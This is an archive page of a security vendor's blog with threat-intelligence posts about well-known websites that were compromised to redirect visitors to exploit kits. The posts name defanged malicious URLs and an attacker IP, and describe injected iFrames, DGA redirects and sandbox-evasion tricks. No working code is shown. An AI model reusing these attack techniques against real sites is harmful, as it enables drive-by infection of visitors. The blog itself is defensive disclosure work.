Websense Security Labs Blog

Websense Security Labs discovers, investigates and reports on advanced Internet threats that traditional security
research methods miss.

Latest Blog Posts

View all posts > 

Compromise tagged in these posts

Official Website of Popular Science Compromised

Posted: 28 Oct 2014 06:25 PM | AToro | no comments


Websense® ThreatSeeker® Intelligence Cloud has detected that the official website of Popular Science has been compromised and is serving malicious code. Popular Science is a well-established monthly magazine with a readership of more than a million, focusing on making science and technology subjects accessible to the general reader. The site is injected with a malicious code that redirects users to websites serving exploit code, which subsequently drops malicious files on each victim's computer. Websense Security Labs™ has contacted the IT team of Popular Science with a notification regarding the compromise. The main page of Popular Science on October 28, 2014: Websense customers are protected from this threat by ACE, our Advanced Classification Engine , at the following stages of the seven stages an advanced threat goes through when attempting to steal your data: Stage 2 (Lure) - ACE has detection for the compromised websites. Stage 4 (Exploit Kit) - ACE has detection for the malicious code that attempts to execute this cyber attack. Analysis The website has been injected with a malicious iFrame, which automatically redirects the user to the popular RIG Exploit Kit. The same Exploit Kit has been used in the compromise of METRO’s website as well. The exploit kit launches various exploits against the victim which – if successful – will result in a malicious executable dropped on the user’s system. The injected iFrame: In most cases, malicious injections redirect the user to a TDS, which then further redirects to the exploit kit’s landing page. However, as it is often the case with the RIG Exploit Kit, the injected code sends the victim directly to the landing page. Obfuscated RIG Exploit Kit landing page: The exploit kit landing page is heavily obfuscated to make analysis and detection more difficult. Before launching any exploit, the RIG Exploit Kit uses CVE-2013-7331 XMLDOM ActiveX control vulnerability to list antivirus (AV) software on the target system. Checking for AV: This technique has been used by a number of exploit kits recently, most notably the Nuclear and Angler exploit kits. If the user doesn’t have any of the checked AVs installed, then the exploit kit proceeds to evaluate the installed plug-ins and their versions, in particular Flash, Silverlight, and Java. If a vulnerable plug-in is found, the appropriate exploit is launched. De-obfuscated script launching Java Exploit: High-Level Stats: Who is impacted by this injection? Websense telemetry indicates that this type of injection is widespread across the globe. Multiple industries are seen to be continuously affected by this threat. Affected countries: Affected industries: Conclusion As we mentioned in the past , compromising popular web pages is a popular technique used by cyber criminals to launch their attacks. It is important that users employ advanced security products that can protect them at various stages of the attacks.

Read more > 

Filed under: ,

METRO.US Website Compromised to Serve Malicious Code

Posted: 22 Jul 2014 04:18 PM | Ran Mosessco | no comments


Websense® ThreatSeeker® Intelligence Cloud has detected that the U.S. version of the Metro International website (metro.us) has been compromised and is serving malicious code. Metro newspaper editions are distributed in high-traffic commuter zones or in public transport networks. In the U.S., Metro is published in New York, Boston, and Philadelphia, and is "written and designed for young and ambitious professionals." The U.S. website has over 1 million visitors a month. When a visitor goes to the main page, metro.us redirects to metro.us/newyork/. That page is injected with a malicious iFrame that redirects users to websites serving exploit code, which subsequently drops malicious files on the victim's computer. Websense Security Labs™ has contacted the IT team of metro.us with a notification regarding the compromise, and they are investigating the issue. Please note that in the UK there is an unrelated Metro publication ( Associated Newspapers), which is not linked to the campaign in question. metro.us main page as of 22 July 2014: SimilarWeb.com statistics for metro.us Websense customers are protected from this threat by ACE, our Advanced Classification Engine , at the following stages: Stage 2 (Lure) - ACE has detection for the compromised websites. Stage 3 (Redirect) - ACE has detection for the injected code that redirects the user to the exploit page. Stage 4 (Exploit Kit) - ACE has detection for the malicious code that attempts to execute this cyber attack. Stage 5 (Dropper Files) - ACE has detection for the binary files associated with this attack. Stage 6 (Call Home) - Communication to the associated C&C server is prevented. Analysis The injected code has been found in multiple locations within the main website. When a user browses to the main website, the injected code loads automatically, and silently redirects the user through a TDS (Traffic Distribution System or Traffic Direction System) to a website hosting the RIG Exploit Kit. The exploit kit tries to load exploit codes to exploit various vulnerabilities, in order to drop a malicious executable on the victim's computer. Here is a sample of the injected iFrame (which was found on multiple pages on metro.us): The redirection target from the iFrame (hxxp://fsbook.us/?mt) is part of the TDS. It sets a cookie (to thwart repeated analysis attempts), then redirects to hxxp://fsbook.us/link.php: hxxp://fsbook.us/link.php in turn redirects to the RIG Exploit Kit landing page: RIG Exploit Kit RIG "came on the scene" around April 2014, and was heavily used to distribute ransomware such as Cryptowall. According to Websense ThreatSeeker Intelligence Cloud telemetry, as expected for this specific campaign, most of the victims come from the U.S. and Canada, but let's take a broader look at the geographic telemetry from RIG Exploit Kit, in the last 2 months: Top 10 Countries affected by RIG Exploit Kit Country Percent of Total United States 32.36% Canada...

Read more > 

Filed under: , ,

The official website of AskMen is compromised to serve malicious code

Posted: 23 Jun 2014 02:55 PM | AToro | no comments


Websense® ThreatSeeker® Intelligence Cloud has detected that the official website of AskMen (at www.askmen.com ), a popular free online men's web portal , has been compromised and injected with malicious "drive by" code that appears to be part of a mass-injection attack. According to similarweb.com , AskMen's website has more than 10 million visitors each month. The injected code redirects a user to a website serving exploit code, which subsequently drops malicious files on the victim's computer. Websense Security Labs™ has contacted the host master of askmen.com with a notification regarding the compromise. Update : We've been working with Ziff Davis' web security team regarding the compromise, as of today (7th July 2014) we verified with our processes that the website is clean when checked at 14:00 BST and does not serve malicious code. This is not a guarantee the website will continue to be clean. We will continue to monitor the website and update the blog if needed. AskMen's main page as of 23 June 2014: SimilarWeb.com statistics for AskMen: Websense customers are protected from this threat with ACE, our Advanced Classification Engine , at the following stages: Stage 2 (Lure) - ACE has detection for the compromised websites. Stage 3 (Redirect) - ACE has detection for the injected code that redirects the user to the exploit page. Stage 4 (Exploit Kit) - ACE has detection for the malicious code that attempts to execute this cyber-attack. Stage 5 (Dropper Files) - ACE has detection for the binary files associated with this attack. Stage 6 (Call Home) - Communication to the associated C&C server is prevented. Analysis The injected code has been found in multiple locations within the main website as well as in localized versions of it, like au.askmen.com. When a user browses to the main website, the injected code loads automatically and silently redirects the user to a website serving the actual exploit code. The injected code is obfuscated and can be found at the bottom of legitimate JavaScript pages on AskMen's website. The injected code on AskMen's website: How DGA is used to redirect the user The obfuscation used here is a simple base64 encoding, which can be easily de-obfuscated to a Redirect to a website generated by its domain generation algorithm (DGA) as well as the DGA itself. De-obfuscated JavaScript code: What the above code does is basically this: It takes the current date (year, month, and day) and uses a CRC32 algorithm as a hash function to hash that data, which ends up being the domain name. This means that a new domain will be generated everyday, and as we know how the algorithm works, we can easily predict future domains. For example, the domains that will be generated in the next 7 days (from 24 to 30 June) can be seen below. Exploit page URLs from 24 to 30 June: The Redirect takes the unsuspecting user to a heavily obfuscated page serving a Java exploit (most likely CVE...

Read more > 

Filed under: , , , ,

Cyber criminals expand use of CVE-2014-0322 before Patch Tuesday

Posted: 10 Mar 2014 01:54 PM | Elad Sharf | no comments


In advance of the Internet Explorer zero-day referenced by the CVE-2014-0322 patch that will commence on patch Tuesday the March 11, we thought it would be helpful to look at how this exploit was utilized in the lure stage, since this may unveil some of the tactics used by crimeware and targeted attack actors in this day and age. We've seen this latest zero-day employed by targeted attacks involving a cybersquatted domain that appeared to target the French Aerospace Association , as we described in our previous blog post on the subject. Since then, exploit instances utilizing CVE-2014-0322 have been carried out in crimeware attacks in the wild, and it seems that the exploit source code used in the initial attacks was made available publicly, which contributed to the usage of the zero-day. The exploit code availability in the public domain led to additional exploit instances popping up in the wild and was seen coming from compromised websites by actors that were looking to make a quick profit from the security hole. In this blog, we're going to take a look at the initial cybersquatted website used to employ the zero-day and different high-profile websites that served the zero-day for crimeware propagation. Specifically, we're going to look at the lure stage of the attacks to understand how code was used in that stage with the ultimate aim of redirecting victims to the exploit. Top websites seen injected with malicious code leading to the exploit utilizing CVE-2014-0322: gifas.assso.net - Impersonating GIFAS French Aerospace Association website (http://gifas.asso.fr), hosted in Santa Clara, CA hatobus.co.jp - Japanese Travel Website, hosted in Tokyo, Japan english.com.tw - Taiwanese English School, Hosted in San Antonio, Texas, USA chemistry.hku.hk - Hong Kong University Chemistry Dept, Hosted in Hong Kong, China vfw.org - Veterans of Foreign Wars, Hosted in Blue Springs, Missouri, USA The initial lure and attack vector - cybersquatted domain @ hxxp://gifas.assso.net The lure in the initial attacks appears to have been a cybersquatted domain, @ hxxp://gifas.assso.net, taking advantage of the legitimate domain, hxxp://gifas.asso.fr, that is part of the French Aerospace Association . The attack effectively employed the fake domain with some copied content from the legitimate website along with an additional *iFrame* the led to the exploit located on the same host at hxxp://gifas.assso.net/include.html. We can see that there are still references on the cybersquatted website that the code was copied from another website in the form of a "watermark" tag below the iFrame that indicates <!-- saved from ... [click to enlarge] The fake gifas.assso.net is hosted on IP address 147.255.229.61. This IP seems to host some other hosts with malicious code. We found the IP hosted update19.homelinux.org, which is an exact replica of gifas.assso.net and is probably a test bed before launching the actual attack. High-profile compromises utilizing...

Read more > 

Filed under: , , , ,

'GWload' - The 'Social Engineering' Based Mass Injection Making Its Rounds

Posted: 28 Oct 2013 07:30 PM | Elad Sharf | no comments


Websense® Security Labs™ ThreatSeeker® Intelligence Cloud has identified that a new mass injection campaign is making its rounds, compromising and injecting content into tens of thousands of legitimate websites. This campaign is an evolution and expansion of an existing injection campaign that Websense® Security Labs™ has been monitoring since January of this year. Our telemetry shows that, to date, at least 40,000 compromised pages have occurred on the Web, redirecting and tricking users to install rogue software. We see parallels of the injected websites with websites that were affected by the "cookiebomb" mass injection, which was mostly associated with delivering "ransomware" payloads. (Our blog on CookieBomb attack is here ). Let's get back to GWload... We've made three key observations about this campaign. The first is the use of a social engineering technique to lure users into downloading malicious and undesirable content. Although most website injections in the wild redirect to exploit websites, this dominant campaign seems to shift the focus to using a social engineering technique, rather than exploits, to get unwanted content installed on victims' machines. Our second observation is that the time of emergence of this campaign coincides with the arrest of the Blackhole Exploit Kit author 'Paunch,' which could explain the change in mass injection tactics, as actors move from serving exploits to social engineering. This shows that the cyber underground may have contingency plans in place to adapt and react quickly to change. Our third key observation is that the campaign employs an 'end to end' infrastructure of legitimate websites. These legitimate websites become compromised so that they ultimately serve rogue content. The cyber criminals deploy code to defeat ad-blockers and code that 'locks content' and access to the website until a certain action is complete (a technique that in the past has been used with Cost per Action CPA lead -based scams on the Facebook platform. To be clear, conducting CPAlead campaigns is not illegal; however, using CPAlead advertising methods that deceive users is illegal. The ultimate aim of the lure is to install rogue software that compensates the actors through an affiliation program. In this blog we're going to cover the different aspects of this mass injection campaign and share relevant telemetry. Executive Summary Thousands of legitimate web pages are compromised in a mass injection campaign we dubbed 'GWload' and detected as early as the week of the 14th of October. The campaign employs a social engineering technique to lure users into downloading rogue content. Most mass injections found in the wild typically redirect to exploit websites; employing a social engineering technique instead of exploits seems to be a shift in focus to push software installations, adware, and spyware without the user's consent...

Read more > 

Filed under: , , ,

Honeyclient Evasion Techniques, Bible.org Case

Posted: 25 Feb 2013 03:55 AM | Elad Sharf | 1 comment(s)


Hot on the heels of the NBC.com hack last week, Websense® Security Labs™ researchers were alerted by SANS to another high profile website compromise on Friday: bible.org . It appears that the offending code has now been removed from the bible.org website. At first glance, this seemed to be a run-of-the-mill “compromise, redirect, exploit” chain; however, closer analysis revealed the use of an interesting Honeyclient evasion technique. Honeyclients allow the profiling of websites in a heuristic and automated way; more often, testing a website with a Honeyclient takes longer than signature-based solutions but the results are much more accurate, especially when new zero-day code or a new emerging threat needs to be flagged up and requires scrutiny. Usually, Honeyclients run on top of virtual machine sandboxes: evasion techniques allow malicious code to become more aware of its running environment and to check if it's in a virtual environment or likely to be an 'analysis' environment before actually running malicious code. This snippet of code is the entirety of the Honeyclient evasion attempt - as the method name suggests, the function ‘jsstatic’ will only be called once the eventhandler registers the movement of the user’s mouse over the document (page) – obviously, a primitive Honeyclient will have no mouse movement emulation, therefore the offending function that leads to exploit code will never be called and alerted on by the Honeyclient. Let’s take a closer look at the jsstatic function (click to enlarge): The first part of this function definition is simply a sentry variable, to stop the function being executed indefinitely with each new onmousemove event – the global variable astatf is defined as 0 in an earlier part of the script. The next part simply creates the iFrame, which is then executed as if it had just been injected into the page, as per a normal compromise. This technique is quite primitive and showcases the infancy of this type of Honeyclient evasion technique. The plethora of event handling methods available means this technique is not going to go away anytime soon, and is likely only going to get more complex and inventive. In summary: the use of such techniques ultimately aids malicious code in remaining undetected for longer periods of time and thus increases its chances of bypassing security products undetected. The technique described in this blog is simple and allows redirection to exploits only if a mouse movement is detected, an action that is often associated with an actual person interacting with a website and often not used by primitive Honeyclients. Why are the attackers using this technique instead of the normal drive-by type technique we usually see? probably because they wanted to make the attack more stealthy, as attacks like this wouldn't be picked up by automated behavioral analysis systems. That's why multiple layers of defense are needed...

Read more > 

Filed under: ,

NBC.com Compromised

Posted: 22 Feb 2013 01:05 AM | Patrik Runald | no comments


Earlier today the main website of NBC and some of their show websites (such as www.jaylenosgarage.com) were compromised and served malicious content to users. The malicious content was inserted as a one-line iframe tag on one of the JavaScripts that gets loaded every time a user visits the page: This one line of code forces the web browser of every visiting user to download content from the walterjeffers site, which, in turn, redirects the user to two other sites that eventually use an exploit kit to automatically install a malicious file onto the computer. During the few hours the attack was active, we saw several different URLs being used by the attackers. See the screenshot below for the sequence of events as recorded by our replay system that we have in Websense Security Labs. Two vulnerabilities were used to compromise the user’s computer. In the above example, we can see a PDF file, but the exploit will also try Java vulnerabilities. If either is successful, a malicious binary from the Citadel family is installed on the machine. This family of malware is a so-called banking Trojan, which is designed to help the cyber criminals steal money from online banking accounts. While the file has very bad coverage from antivirus solutions according to VirusTotal , our Websense ThreatScope technology was able to see it as suspicious and provide a lot of additional details about the behavior of the file. See here for the full report . Websense customers were proactively protected against the exploit code attack by our real-time analytics specifically designed to prevent exploit kits. NBC has since confirmed that their site has been cleaned up, and it's again safe to visit.

Read more > 

Filed under:

2013 Threat Report: More Than Scary Stats and Chilling Charts

Posted: 13 Feb 2013 08:30 AM | Carl Leonard | no comments


The 2013 Threat Report from the Websense® Security Labs™ is now available.

 

The report details mobile, social, email and web-based threats, and while it is full of ominous data points, it is a very interesting read. The report is designed to help security professionals keep current with threat trends and improve the effectiveness of existing security solutions. It can also be used to identify and prioritize security gaps that may require new approaches and more innovative strategies.

 

Creating the report began with the ThreatSeeker® Network, composed of big data clusters used by the WSL to collect and manage up to 5 billion inputs each day from 900 million global endpoints. Malware samples, mobile applications, email content, web links and other information were then passed through deep analysis processes including our Advanced Classification Engine (ACE), which applied over 10,000 different analytics.

 

...

Read more > 

Filed under: , , , , , , , , , , , , , ,

Forex Website Targeted: Did Cybercrooks Find the Weakest Link in Online Money Management Services?

Posted: 28 Nov 2012 02:29 AM | Gianluca Giuliani | no comments


 

The Websense® ThreatSeeker® Network has detected that a FOREX trading website was injected with a malicious Java applet, which could install malware on the affected systems of the site's users. FOREX is the foreign exchange market where international currencies are traded, and nowadays, it's used by millions of people around the world.

 

The targeted website is a popular FOREX website called "Trading Forex," located at hxxp://tradingforex.com. One of the questions that is raised when encountering such a compromise is whether some cybercriminal shift their focus from mainstream online money management systems of banks and stock exchanges to "easier wins" with online systems and services that are likely to be less mature from a security perspective. Another interesting fact is that the dropped backdoor at Trading Forex is written in Visual Basic.Net and requires the Microsoft's .NET framework to be successfully installed and operational on the victim's computer.

 

Websense customers are protected from these and other threats by  ACE, our Advanced Classification Engine.

 

 

 

...

Read more > 

Filed under: , ,

Iranian Firefighters' Website Compromised to Serve VertexNet RAT

Posted: 01 Nov 2012 03:00 AM | Gianluca Giuliani | no comments


 

Thanks to the Websense® ThreatSeeker™ Network, we have detected that an Iranian website has been compromised to serve a Remote Administration Tool (RAT) called VertexNet. This website does not have a high Alexa rank, but is one of a few cases which has caught our attention. The targeted website (reachable at the URL: hxxp://www.sarifire.ir) seems to be a portal documenting the activities of firefighters in the city of Sari, located in northern Iran. Given Iran's high profile in recent news stories, we decided to analyze this case. At this time, the website still seems to be injected, as shown below:

 

 

 

...

Read more > 

Filed under: ,